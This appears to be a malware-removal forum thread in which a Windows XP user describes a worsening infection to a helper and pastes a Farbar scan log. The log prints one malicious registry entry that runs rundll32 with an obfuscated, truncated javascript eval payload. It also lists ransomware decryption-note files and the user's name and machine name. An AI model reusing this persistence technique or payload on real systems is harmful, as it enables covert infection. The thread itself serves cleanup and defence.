KVT

Avenger.txt reloads and grows in size after each startup recommended by MAM so as to rid of captured malware


Dear TWE,

I am writing to you from a friend's computer as mine froze/hung when the internet connection was lost (something you alluded to) during the process of ComboFix scanning the computer (after it downloaded or updated a MS recovery console) which had not found during the process. When the hang-up occurred (before the internet connection was lost) I pressed on the link of your message (if you lose internet connection) of yesterday; a new browsing window opened and that is when I got the 'unable to connect to the internet' message and everything froze. So what to do now? I am VERY afraid that if I need to force a computer restart, the Avenger file will come and install a huge text file and choke my computer before I have the chance to have ComboFix work. Advise? Thanks.


I will, but I am so worried about the outcome. I have now read the link from your instruction on how to deal with the lost internet connection (expected) and I can go change the network settings to address that if there is no connection when I reboot, but that is the least of my worries; I worry that the Avenger will take over; let's see. I will report soon. Thanks.


As predicted and worse, the Avenger has created havoc after rebooting. I tried to delete the Avenger text file before it would spread, but then I got a note that it cannot be deleted as it is used by another program (yet nothing was open). So I ran ComboFix, which worked, and then looked to find its log file in the folders in the C drive. Then I realised that in front of my eyes a new folder with long letters and numbers was created and underneath it most of my C drive files were duplicated, multiplied, and I could see the same happening in other folders below. The hard drive was getting minimised in space, and it was impossible to work and open a browser to send you the log file... which I still do not know where it is. I also found another strangely named file called qualcom or something which seemed to have files from scans. I wish through a team viewer you could look into the PC. I have turned it off of course to avoid it being crushed. What do you suggest now? Can I open in safe mode and work around to find the log file? But then how will I send it to you? I wish ComboFix had not stalled earlier; I knew that on my restarting this would happen :(


Ok, I turned the PC on in safe mode (btw, can I use the internet in safe mode?) and I can look into the folders without having the folders multiply over and in size. I am trying to find the ComboFix log file to copy it via a USB drive and send it to you from this PC but I can't find it. It is not on the desktop and I cannot find it in the C drive. Where can I find it?

If it is not there, can I run ComboFix again from safe mode?

The extra new files in my C drive are all under a new master file which has the same 'my computer' icon, yet it is named '32788R22FWJFW'. It contains:

1. The Local disk C

2. The CD drive D

3. The control panel

4. Shared documents

5. MY name documents

Basically all these are copied, recreated folders of the original C drive and I am tempted to delete them?

The remaining files under the original C drive are:

1. A file named 13aeb57dd9c3dd4707bfd7cf which was created or placed there a week ago when I first got infected. Under it, it has two subfiles named: a) amd64 and b) i386. They do not seem to be infected files and that is why I did not delete them earlier, fearing that they may be system files. They contain files with extensions .dll .cat .gpd .ppd

2. Documents and settings

3. FRST (the farbar folder)

4. Program files

5. Qoobox (it has several quarantined and files including registry back up files)

6. Windows



About your first question, about master file, don't worry, these are created by ComboFix. We will delete them after we clean your system.

 

Second question, open Qoobox folder, and see if ComboFix.txt report is located there.


Ok, now that I received this post of yours I know where to find the ComboFix log file, under the Qoobox folder.

It has 5 folders, yet several of them are empty which tells me that probably the scan did not run all the way (possibly).

These are:

- Backenv

- Lastrun

- Quarantine (which has a C subfolder and a Registry_backups subfolder) and it also has a catchme.log file. Is it the one?

- Test

- TestC


No, I can't find the text file under the Qoobox folder. I can only find .dat files under the 'backEnv' folder. Can I run ComboFix again from safe mode?

Another question: all my files are now on the external drive, on which an IT literate source is awaiting my permission to run a rootkit (possibly a MB rootkit). Is it safe to do? Or better for them to download and run farbar or ComboFix? The scans using MS Security Essentials and MB did not find an infection.


I am on the auto scan stage now that says that it takes 10-20 mins but it has already taken that time. The cursor is there waiting to show the infected files.


Sorry, I did not see this and I had ComboFix running. I will wait a bit more and if it does not progress I will run farbar as you have asked.


Your request ref farbar, was it for the laptop or for the external drive?


I have a feeling you have left for the day; the ComboFix scan was stalled and I could not do anything, so I will reboot and try farbar from safe mode.


Even in safe mode, it is very difficult to perform tasks; I ran farbar; the text files were created. I put a USB into the machine and tried to open the text files (as on right click there is no option to copy them, only to send them somewhere). Automatically they were opened with Word (HOW can I change this so they are opened as text files?) and when I tried to save them on the USB the Word program was crashing and then I saw a notice that Windows was uninstalled. Is that the result of the virus commanding this to happen? I am so disillusioned and exhausted; all I do is try to fix this issue with you. Help pls


'Send to' is not really send; it is copy to. I rebooted in safe mode and have copied the text files from the farbar scans onto a USB; but how do I attach them here? No attach function that I can see.


The computer I work from now does not have Office loaded, so I can't open these text files and copy them as text here; so pls show me how to attach them. I find a challenge in every step! I'm drained! HELP pls.


Ok, this computer has Notepad, so I opened it from Notepad and I copy here the First.text (scan). I will post the Addition.txt in the next post.

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:5-08-2014
Ran by Konstantine Trivizas (administrator) on KONSTANT-8F5437 on 07-08-2014 17:19:29
Running from C:\Documents and Settings\Konstantine Trivizas\Desktop
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Safe Mode (minimal)
 
The only official download link for FRST:
Download link from any site other than Bleeping Computer is unpermitted or outdated.
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...99B7938DA9E4}\LocalServer32: [Default-wmiprvse] rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 220 more characters). <==== ATTENTION!
InvalidSubkeyName: [HKLM\Software\Classes\CLSID\{73E709EA-5D93-4B2E-BBB0-99B7938DA9E4}\LocalServer32\******<*>] <===== ATTENTION
HKU\.DEFAULT\...\Run: [DWQueuedReporting] => C:\Program Files\Common Files\Microsoft Shared\DW\DWTRIG20.EXE [519584 2010-12-21] (Microsoft Corporation)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
URLSearchHook: HKCU - Ad-Aware Security Toolbar - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
BHO: Ad-Aware Security Toolbar -> {6c97a91e-4524-4019-86af-2aa2d567bf5c} -> C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Ad-Aware Security Toolbar - {6c97a91e-4524-4019-86af-2aa2d567bf5c} - C:\Program Files\Lavasoft\AdAware SecureSearch Toolbar\adawareDx.dll ()
Toolbar: HKCU - &Address - {01E04581-4EEE-11D0-BFE9-00AA005B4383} - C:\WINDOWS\system32\browseui.dll (Microsoft Corporation)
Toolbar: HKCU - &Links - {0E5CBF21-D15F-11D0-8301-00AA005B4383} - C:\WINDOWS\system32\SHELL32.dll (Microsoft Corporation)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
DPF: {17492023-C23A-453E-A040-C7C580BBF700} http://go.microsoft.com/fwlink/?linkid=39204
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files\Common Files\Skype\Skype4COM.dll (Skype Technologies)
ShellExecuteHooks: Windows Desktop Search Namespace Manager - {56F9679E-7826-4C84-81F3-532071A8BCC5} - C:\Program Files\Windows Desktop Search\MSNLNamespaceMgr.dll [304128 2009-05-24] (Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 0.0.0.0
Tcpip\..\Interfaces\{44C2C7EA-F701-4F67-880D-ECFE2FE5B7BA}: [NameServer]8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{6A0C5F9A-BF17-46DE-9AC9-35267BF55774}: [NameServer]8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{96E2D96F-12B6-4E49-9218-35E42F97A477}: [NameServer]8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @real.com/nppl3260;version=16.0.0.282 -> c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlchromebrowserrecordext;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlhtml5videoshim;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprndlpepperflashvideoshim;version=1.3.0 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
FF Plugin: @real.com/nprpplugin;version=16.0.0.282 -> c:\program files\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
FF Plugin: @realnetworks.com/npdlplugin;version=1 -> C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
FF Plugin: @Skype Technologies S.A..com/Skype Web Plugin -> C:\Program Files\SkypeWebPlugin\npSkypeWebPlugin.dll (Skype)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @citrixonline.com/appdetectorplugin - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2012-08-22]
FF HKLM\...\Firefox\Extensions: [{34712C68-7391-4c47-94F3-8F88D49AD632}] - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2013-01-02]
 
Chrome: 
=======
CHR HomePage: hxxp://www.google.co.uk/
CHR StartupUrls: "https://www.google.co.uk/"
CHR Plugin: (Widevine Content Decryption Module) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\WidevineCDM\1.4.2.464\_platform_specific\win_x86\widevinecdmadapter.dll No File
CHR Plugin: (Shockwave Flash) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\PepperFlash\pepflashplayer.dll ()
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\Application\36.0.1985.125\pdf.dll ()
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npdrmv2.dll (Microsoft Corporation)
CHR Plugin: (Windows Media Player Plug-in Dynamic Link Library) - C:\Program Files\Windows Media Player\npdsplay.dll (Microsoft Corporation (written by Digital Renaissance Inc.))
CHR Plugin: (Microsoft® DRM) - C:\Program Files\Windows Media Player\npwmsdrm.dll (Microsoft Corporation)
CHR Plugin: (RealNetworks RealDownloader Chrome Background Extension Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
CHR Plugin: (RealNetworks RealDownloader HTML5VideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealNetworks RealDownloader PepperFlashVideoShim Plug-In (32-bit) ) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
CHR Plugin: (RealDownloader Plugin) - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
CHR Plugin: (Citrix Online Web Deployment Plugin 1.0.0.104) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
CHR Plugin: (Facebook Video Calling Plugin) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Facebook\Video\Skype\npFacebookVideoCalling.dll No File
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MICROS~3\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~1\MICROS~3\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Adobe Acrobat) - C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Google Update) - C:\Program Files\Google\Update\1.3.24.7\npGoogleUpdate3.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.550.13) - C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
CHR Plugin: (Java Platform SE 7 U55) - C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Windows Presentation Foundation) - C:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
CHR Plugin: (RealPlayer G2 LiveConnect-Enabled Plug-In (32-bit) ) - c:\program files\real\realplayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
CHR Plugin: (RealPlayer Download Plugin) - c:\program files\real\realplayer\Netscape6\nprpplugin.dll (RealPlayer)
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-05-27]
CHR Extension: (AdBlock) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2014-07-24]
CHR Extension: (Pin It Button) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\gpdjojdkbbmdfjfahjcgigfpmkopogic [2013-05-24]
CHR Extension: (Lavasoft SecureSearch) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\jjjgoniibiigbcfeipbhfcconfgmgmkc [2014-08-05]
CHR Extension: (Save to Pocket) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\niloccemoadcdkdjlinkgdfekeahmflj [2013-10-23]
CHR Extension: (Google Wallet) - C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-08-28]
CHR HKLM\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\Documents and Settings\All Users\Application Data\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2012-11-29]
CHR HKCU\...\Chrome\Extension: [apdfllckaahabafndbhieahigkjlhalf] - C:\DOCUME~1\KONSTA~1\LOCALS~1\APPLIC~1\Google\Drive\apdfllckaahabafndbhieahigkjlhalf_live.crx [2012-11-29]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 BAsfIpM; C:\WINDOWS\system32\basfipm.exe [77824 2003-02-06] (Broadcom Corp.) [File not signed]
S2 JavaQuickStarterService; C:\Program Files\Java\jre7\bin\jqs.exe [182696 2014-03-17] (Oracle Corporation)
S2 LavasoftAdAwareService11; C:\Program Files\Lavasoft\Ad-Aware Antivirus\Ad-Aware Antivirus\11.2.5952.0\AdAwareService.exe [655352 2014-06-03] ()
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [11552 2012-03-26] (Microsoft Corporation)
S2 PEVSystemStart; C:\ComboFix\SWREG.3XE [518144 2000-08-31] (SteelWerX) [File not signed]
S2 RealNetworks Downloader Resolver Service; C:\Program Files\RealNetworks\RealDownloader\rndlresolversvc.exe [38608 2012-11-29] ()
S2 wltrysvc; C:\WINDOWS\System32\bcmwltry.exe [1200128 2005-12-19] (Dell Inc.) [File not signed]
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S2 BASFND; C:\WINDOWS\system32\Drivers\BASFND.sys [6057 2002-03-13] (Broadcom Corporation) [File not signed]
S3 BCM43XX; C:\WINDOWS\System32\DRIVERS\bcmwl5.sys [424448 2006-12-18] (Broadcom Corporation)
S3 GTICARD; C:\WINDOWS\System32\DRIVERS\gticard.sys [59328 2003-02-06] (Texas Instruments)
S3 HSFHWICH; C:\WINDOWS\System32\DRIVERS\HSFHWICH.sys [208384 2005-05-03] (Conexant Systems, Inc.)
S3 HSF_DPV; C:\WINDOWS\System32\DRIVERS\HSF_DPV.SYS [1033728 2005-05-03] (Conexant Systems, Inc.)
S0 MpFilter; C:\WINDOWS\System32\DRIVERS\MpFilter.sys [171064 2012-03-20] (Microsoft Corporation)
S3 STAC97; C:\WINDOWS\System32\drivers\STAC97.sys [264440 2004-11-15] (SigmaTel, Inc.)
R3 tiumfwl; C:\WINDOWS\System32\drivers\tiumfwl.sys [42060 2003-02-14] (Texas Instruments Inc.)
S3 Trufos; C:\WINDOWS\System32\DRIVERS\Trufos.sys [360376 2014-04-22] (BitDefender S.R.L.)
S3 vrvd5; C:\WINDOWS\System32\DRIVERS\vrvd5.sys [11296 2014-06-16] (Rsupport Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-08-07 16:23 - 2014-08-07 16:26 - 00000000 ___SD () C:\ComboFix
2014-08-07 12:13 - 2014-08-07 12:13 - 00000000 _RSHD () C:\cmdcons
2014-08-07 12:13 - 2004-08-03 23:00 - 00260272 __RSH () C:\cmldr
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\WINDOWS\erdnt
2014-08-07 12:08 - 2014-08-07 12:08 - 00000000 ____D () C:\Qoobox
2014-08-07 12:08 - 2011-06-26 07:45 - 00256000 _____ () C:\WINDOWS\PEV.exe
2014-08-07 12:08 - 2010-11-07 18:20 - 00208896 _____ () C:\WINDOWS\MBR.exe
2014-08-07 12:08 - 2009-04-20 05:56 - 00060416 _____ (NirSoft) C:\WINDOWS\NIRCMD.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00518144 _____ (SteelWerX) C:\WINDOWS\SWREG.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00406528 _____ (SteelWerX) C:\WINDOWS\SWSC.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00212480 _____ (SteelWerX) C:\WINDOWS\SWXCACLS.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00098816 _____ () C:\WINDOWS\sed.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00080412 _____ () C:\WINDOWS\grep.exe
2014-08-07 12:08 - 2000-08-31 01:00 - 00068096 _____ () C:\WINDOWS\zip.exe
2014-08-07 11:41 - 2014-08-07 11:42 - 05568206 ____R (Swearware) C:\Documents and Settings\Konstantine Trivizas\Desktop\ComboFix.exe
2014-08-06 16:31 - 2014-08-06 16:32 - 00044049 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\Addition.txt
2014-08-06 16:26 - 2014-08-07 17:20 - 00015839 _____ () C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST.txt
2014-08-06 14:37 - 2014-08-06 14:38 - 01084928 _____ (Farbar) C:\Documents and Settings\Konstantine Trivizas\Desktop\FRST (3).exe
2014-08-06 13:51 - 2014-08-07 17:19 - 00000000 ____D () C:\FRST
2014-08-05 16:15 - 2014-08-05 16:15 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\Lavasoft
2014-08-05 15:43 - 2014-08-07 14:31 - 00002028 _____ () C:\Documents and Settings\All Users\Desktop\Ad-Aware Antivirus.lnk
2014-08-05 15:43 - 2014-08-05 15:43 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Ad-Aware Antivirus
2014-08-05 15:35 - 2014-08-07 14:31 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Ad-Aware Browsing Protection
2014-08-05 15:35 - 2014-08-05 17:15 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Search Protection
2014-08-05 15:35 - 2014-08-05 15:35 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Local Settings\Application Data\adawarebp
2014-08-05 15:34 - 2014-08-05 15:34 - 00000000 ____D () C:\Program Files\Toolbar Cleaner
2014-08-05 15:33 - 2014-08-05 15:34 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\adawaretb
2014-08-05 15:28 - 2014-08-05 15:28 - 00000000 ____D () C:\Program Files\Common Files\Lavasoft
2014-08-05 15:14 - 2014-08-05 15:14 - 00000000 ____D () C:\Documents and Settings\Konstantine Trivizas\Application Data\LavasoftStatistics
2014-08-05 14:02 - 2014-08-05 15:38 - 00000000 ____D () C:\Program Files\Lavasoft
2014-08-05 13:40 - 2014-08-05 13:41 - 00001355 _____ () C:\WINDOWS\imsins.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00001083 _____ () C:\WINDOWS\netfxocm.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000425 _____ () C:\WINDOWS\MedCtrOC.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000342 _____ () C:\WINDOWS\ocmsn.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000311 _____ () C:\WINDOWS\tabletoc.log
2014-08-05 13:40 - 2014-08-05 13:41 - 00000309 _____ () C:\WINDOWS\msgsocm.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00006642 _____ () C:\WINDOWS\iis6.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00002822 _____ () C:\WINDOWS\tsoc.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00002058 _____ () C:\WINDOWS\comsetup.log
2014-08-05 13:39 - 2014-08-05 13:41 - 00001248 _____ () C:\WINDOWS\ntdtcsetup.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00001878 _____ () C:\WINDOWS\msmqinst.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setuperr.log
2014-08-05 13:39 - 2014-08-05 13:39 - 00000000 _____ () C:\WINDOWS\setupact.log
2014-08-05 13:38 - 2014-08-05 13:41 - 00006183 _____ () C:\WINDOWS\FaxSetup.log
2014-08-05 13:38 - 2014-08-05 13:41 - 00002956 _____ () C:\WINDOWS\ocgen.log
2014-08-05 13:34 - 2014-08-05 13:36 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB942288-v3$
2014-08-05 13:32 - 2014-08-05 13:41 - 00008464 _____ () C:\WINDOWS\KB942288-v3.log
2014-08-05 13:29 - 2014-08-05 13:29 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Lavasoft
2014-08-05 12:39 - 2014-08-05 15:39 - 00011803 _____ () C:\WINDOWS\setupapi.log
2014-08-04 17:11 - 2014-08-06 16:24 - 00110296 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2014-08-04 17:11 - 2014-08-04 17:11 - 00000777 _____ () C:\Documents and Settings\All Users\Desktop\Malwarebytes Anti-Malware.lnk
2014-08-04 17:11 - 2014-08-04 17:11 - 00000000 ____D () C:\Documents and Settings\All Users\Start Menu\Programs\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-05 18:29 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-08-04 17:10 - 2014-08-04 17:10 - 00000000 ____D () C:\Documents and Settings\All Users\Application Data\Malwarebytes
2014-08-04 17:10 - 2014-05-12 07:26 - 00053208 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2014-08-04 17:10 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mbam.sys
2014-08-04 17:04 - 2014-08-07 17:11 - 00032340 _____ () C:\WINDOWS\SchedLgU.Txt
2014-08-04 17:04 - 2014-08-07 14:48 - 00000215 _____ () C:\WINDOWS\wiadebug.log
2014-08-04 17:04 - 2014-08-07 14:21 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-08-04 17:04 - 2014-08-04 17:04 - 00000000 ____N () C:\WINDOWS\Sti_Trace.log
2014-08-04 16:59 - 2014-08-04 17:00 - 00000000 ____D () C:\WINDOWS\pss
2014-08-04 16:56 - 2014-08-07 17:11 - 00105714 _____ () C:\WINDOWS\WindowsUpdate.log
2014-08-04 16:55 - 2014-08-04 16:55 - 00000000 __SHD () C:\Documents and Settings\Administrator\IETldCache
2014-08-04 16:54 - 2014-08-04 17:02 - 00000178 ___SH () C:\Documents and Settings\Administrator\ntuser.ini
2014-08-04 16:54 - 2014-08-04 17:02 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Temp
2014-08-04 16:54 - 2014-08-04 17:02 - 00000000 ____D () C:\Documents and Settings\Administrator\Local Settings\Application Data\Google
2014-08-04 16:54 - 2014-08-04 16:56 - 00000000 ____D () C:\Documents and Settings\Administrator
2014-08-04 16:54 - 2014-08-04 16:54 - 00000000 ____D () C:\WINDOWS\CSC
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00008198 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.HTML
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Local Settings\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00004144 _____ () C:\Documents and Settings\Administrator\Application Data\DECRYPT_INSTRUCTION.TXT
2014-08-04 16:54 - 2014-08-01 09:47 - 00000274 _____ () C:\Documents and Settings\Administrator\Local Settings\DECRYPT_INSTRUCTION.URL
